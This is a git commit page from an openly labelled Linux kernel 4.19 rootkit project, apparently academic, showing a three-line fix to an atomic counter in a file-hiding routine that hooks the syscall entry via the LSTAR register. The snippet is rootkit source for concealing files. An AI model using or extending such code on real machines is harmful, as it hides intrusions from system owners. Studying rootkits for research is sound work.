linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 05f785a35d79bb6035f712f2e5939845b8b9fdf6
parent a34b4932cc437edb90f78fe51315b35cba529114
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 11 Jan 2021 00:01:35 +0100

fix attempt

Diffstat:

Msrc/filehide_lstar.c | 3++-


1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -47,7 +47,8 @@ static unsigned long old_off;
 void
 hide_files_lstar(void)
 {
-    if (atomic_inc_return(&syscall64_install_count) == 1) {
+    if (atomic_read(&syscall64_install_count) == 0) {
+        atomic_inc(&syscall64_install_count);
         atomic_set(&syscall64_count, 0);
         syscall_64_ptr = find_do_syscall_64((char *)read_msr(MSR_LSTAR));